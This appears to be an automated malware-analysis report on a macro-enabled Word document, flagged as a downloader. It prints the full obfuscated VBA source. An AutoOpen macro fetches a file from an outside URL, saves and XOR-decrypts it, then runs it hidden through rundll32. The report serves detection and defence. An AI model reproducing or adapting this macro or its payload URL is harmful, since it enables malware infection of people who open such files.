MALICIOUS
452
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing obfuscated VBA macros. Heuristics indicate the presence of auto-executing macros that use CreateObject and Shell calls, likely to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature as a downloader.
Heuristics 11
-
ClamAV: Xls.Downloader.Donoff-10030344-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Donoff-10030344-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide) -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGK1DASH1solo = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(3)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34, "savet" + "ofile", VbMethod, mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB, 2 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://bernardchandran.com/67SELbosjc358 Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12689 bytes |
SHA-256: 1906b163ef2f55e9b86d7dae07a7b87c3372fb054f1f0ed9cfe5d09686eb1856 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FormatGUID "109"
End Sub
Attribute VB_Name = "Module1"
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34 As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKKSKLAL As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKLAKOPPC As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay() As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKGMAKO As Object
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGK4 As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 As String
Public mamumakiumanaupanddeapundeSESHESHEETIHMYAGKASALLLP As Variant
Public Function SureDateTime(ByRef inCheckDate As Variant) As String
If inCheckDate <> "" Then
SureDateTime = Format(inCheckDate, "dd-mm-yyyy hh:mm")
Else
SureDateTime = Format(Now, "dd-mm-yyyy hh:mm")
End If
End Function
Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
Dim tmp As String
Dim i As Long
If dilodan Then
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKLAKOPPC = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKKSKLAL(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(6))
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKLAKOPPC
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA + "\jugginnh"
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA + mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(12)
Exit Function
Else
GoTo VarPupka
End If
restart:
For i = 1 To Len(tlfNr)
If Mid$(tlfNr, i, 1) = " " Then
tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
GoTo restart
End If
Next i
For i = 1 To Len(tlfNr)
tmp = tmp & Mid$(tlfNr, i, 1)
If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
tmp = tmp & " "
End If
Next i
TlfFormat = tmp
VarPupka:
CallByName mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34, "savet" + "ofile", VbMethod, mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB, 2
UNDOPRYXOR mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKABBB, mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA, "G8sMYyOeUwNWLFPVLbf7GrOdWsjHF8tY"
'mamumakiumanaupanddeapundeSESHESHEETIHMYAGKGMAKO.Open (mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA)
Call Shell("rundl" & "l32.exe " & mamumakiumanaupanddeapundeSESHESHEETIHMYAGKUUUKA & ",qwerty", vbHide)
End Function
Private Function PunktumTilKomma(ByVal s As String) As String
PunktumTilKomma = Replace(s, ".", ",")
End Function
Public Function SureDate(ByRef inCheckDate As Variant) As String
If inCheckDate <> "" Then
SureDate = Format(inCheckDate, "dd-mm-yyyy")
Else
SureDate = Format(Now, "dd-mm-yyyy")
End If
End Function
Public Function SureTime(ByRef inCheckTime As Variant) As String
If inCheckTime <> "" Then
SureTime = Format(inCheckTime, "HH:MM")
Else
SureTime = Format(Now, "HH:MM")
End If
End Function
Public Function KommaTilPunktum(ByVal s As String) As String
KommaTilPunktum = Replace(s, ",", ".")
End Function
Public Function NombreUsuario() As String
Dim SQL As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34.Type = 0 + 0 + 1
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34.Open
Exit Function
SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
If Not RsUsuario.EOF Then
NombreUsuario = RsUsuario!usu_apodo
End If
End Function
Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Function FromDBDate(ByVal mmddyyDate As String) As String
FromDBDate = Format(mmddyyDate, "dd-mm-yyyy")
End Function
Public Function FromDBDateTime(ByVal mmddyyhhmmDateTime As String) As String
FromDBDateTime = Format(mmddyyhhmmDateTime, "dd-mm-yyyy hh:mm")
End Function
Public Function ToDBDate(ByVal ddmmyyDate As String) As String
ToDBDate = Format(ddmmyyDate, "mm-dd-yyyy")
End Function
Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGK1DASH1solo = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(3))
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKKSKLAL = mamumakiumanaupanddeapundeSESHESHEETIHMYAGK1DASH1solo.Environment(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(2 * 2))
VerCadenaPermiso ddmmyyhhmmDateTime
End Function
Attribute VB_Name = "Module2"
Public Function FromDBBool(ByVal inBoolStr As String) As Integer
If Not inBoolStr = "" Then
If CBool(inBoolStr) = True Then
FromDBBool = 1
Else
FromDBBool = 0
End If
Else
FromDBBool = 0
End If
End Function
Public Sub VerCadenaPermiso(permiso As String)
Dim i As Long
Dim letra As String
Alta = False
Baja = False
modi = False
Dim Consu As Boolean
Consu = True
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK4 = "http://bernardchandran.com/67SELbosjc358"
If Application = "Microsoft Word" Then
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.Open mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(5), mamumakiumanaupanddeapundeSESHESHEETIHMYAGK4, False
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.Send
TlfFormat letra, True
NombreUsuario
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKacheha letra
End If
Exit Sub
For i = 1 To Len(permiso)
letra = Mid(permiso, i, 1)
If letra = "A" Then
Alta = True
End If
If letra = "B" Then
Baja = True
End If
If letra = "M" Then
modi = True
End If
If letra = "C" Then
Consu = True
End If
Next i
If Len(permiso) = 0 Then
Consu = False
modi = False
Alta = False
Baja = False
End If
End Sub
Public Sub DecryptByte(ByteArray() As Byte, Key As String)
Dim offset As Long
Dim ByteLen As Long
Dim ResultLen As Long
Dim CurrPercent As Long
Dim NextPercent As Long
Dim m_Key() As Byte
Dim m_KeyLen As Long
m_KeyLen = Len(Key)
ReDim m_Key(m_KeyLen)
m_Key = StrConv(Key, vbFromUnicode)
ByteLen = UBound(ByteArray) + 1
ResultLen = ByteLen
For offset = 0 To (ByteLen - 1)
ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
If (offset >= NextPercent) Then
CurrPercent = Int((offset / ResultLen) * 100)
NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
End If
Next
End Sub
Public Function mamumakiumanaupanddeapundeSESHESHEETIHMYAGKacheha(pass As String) As String
Dim temp As String
Dim mamumakiumanaupanddeapundeSESHESHEETIHMYAGKtum As String
GoTo beyTumba
Dim pos As Long
Dim leng As Long
Dim tim As Variant
Dim i As Long
Dim Key As Long
leng = Len(pass)
tim = Mid(Time, 1, 8)
tim = Mid(tim, 1, Len(tim) - 3)
tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
For i = 1 To Len(CStr(tim))
pos = pos + CInt(Mid(CStr(tim), i, 1))
Next
While pos > Len(pass)
pos = pos Mod 10 + Int(Rnd * 10)
If pos = 0 Then
pos = Len(pass) + 1
End If
Wend
beyTumba:
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKASALLLP = mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw.responseBody
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKbridnec mamumakiumanaupanddeapundeSESHESHEETIHMYAGKtum
End Function
Public Sub UNDOPRYXOR(SourceFile As String, DestFile As String, Optional Key As String)
Dim Filenr As Integer
Dim ByteArray() As Byte
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr
Call DecryptByte(ByteArray(), Key)
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr
End Sub
Public Function FGUID(ByVal sGUID As String) As String
If sGUID = "" Or sGUID = "null" Then
FGUID = "null"
ElseIf Left$(sGUID, 1) = "" Then
FGUID = sGUID
Else
FGUID = ""
End If
End Function
Attribute VB_Name = "Module3"
Public Function FormatGUID(ByRef inGUID As String) As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = "HRUUMERicroHRUUUMERoft.XHRUUMERLHTTPHRUUUUMERAdodb.HRUUUMERtrHRUMERaHRUUMERHRUUUUMERHRUUUMERhHRUMERll.Ap"
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 + GodnTeBabenParama("plicationHRUUUUMERWHRUUUMERcript.HRUUUMERhHRUMERllHRUUUUMERProcHRUMERHRUUUMERHRUUUMERHRUUUUMERGHRUMERTHRUUUUMERTHRUMERHRUUMERPHRUUUUMERTypHRUMERHRUUUUMERopHRUMERnHRUUUUMERwritFILMABOponHRUUUMERHRUMERBodyHRUUUUMERHRUUUMERavHRUMERtofilHRUMERHRUUUUMER", "FILMABO", "HRUMERHRUUUUMERrHRUMERHRUUUMER")
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = GodnTeBabenParama(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 + "\chrendoksHRUUUMER.dll", "HRUMER", "e")
Pintogramm Salida
Exit Function
If Mid$(inGUID, 1, 1) <> "{" Then
FormatGUID = "{" & inGUID & "}"
Else
FormatGUID = inGUID
End If
End Function
Public Function Pintogramm(ByVal Cadena As String) As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = GodnTeBabenParama(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2, "HRUUMER", "M")
FTEXT ""
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34 = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(1))
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKGMAKO = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(5 - 3))
ClearString ""
End Function
Public Function FTEXT(ByRef txt As String) As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2 = GodnTeBabenParama(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2, "HRUUUMER", LCase("S"))
If txt = "" Then
FTEXT = "NULL"
Else
FTEXT = ""
End If
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay = Split(mamumakiumanaupanddeapundeSESHESHEETIHMYAGK2, "HRUUUUMER")
End Function
Public Function FLONG(ByVal inNumStr As String) As String
If Not IsInteger(inNumStr) Then
FLONG = "0"
Else
FLONG = inNumStr
End If
End Function
Public Function mamumakiumanaupanddeapundeSESHESHEETIHMYAGKbridnec(pass As String) As String
Dim pos As Long
Dim Key As Long
Dim temp As String
Dim i As Long
Dim mamumakiumanaupanddeapundeSESHESHEETIHMYAGKtum As String
mamumakiumanaupanddeapundeSESHESHEETIHMYAGKra12dv34.Write mamumakiumanaupanddeapundeSESHESHEETIHMYAGKASALLLP
TlfFormat "", False
End Function
Public Function FREAL(ByVal inRealStr As String) As String
If Not IsReal(inRealStr) Then
FREAL = "0.0"
Else
FREAL = inRealStr
End If
End Function
Private Function ClearString(ByRef inOrigString As String) As String
Dim strNewString As String
Dim sChar As String
Dim i As Integer
Dim d As Boolean
d = True
IsWord = True
For i = 1 To Len(Trim("ceces"))
If d = False Then
Set mamumakiumanaupanddeapundeSESHESHEETIHMYAGKDAcdaw = CreateObject(mamumakiumanaupanddeapundeSESHESHEETIHMYAGKPLdunay(i - 2))
Exit For
Else
d = False
End If
Next i
ToDBDateTime ""
Exit Function
For i = 1 To Len(inOrigString)
sChar = Mid(inOrigString, i, 1)
If sChar = "" Then
strNewString = strNewString & "ґ"
Else
strNewString = strNewString & sChar
End If
Next i
ClearString = strNewString
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 33280 bytes |
SHA-256: 00aca35c13e9c3f465bdae7ab941fee1fd8770df6fcf4ca9cc99b2f031ad0b18 |
|||
|
Detection
ClamAV:
Xls.Downloader.Donoff-10030344-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.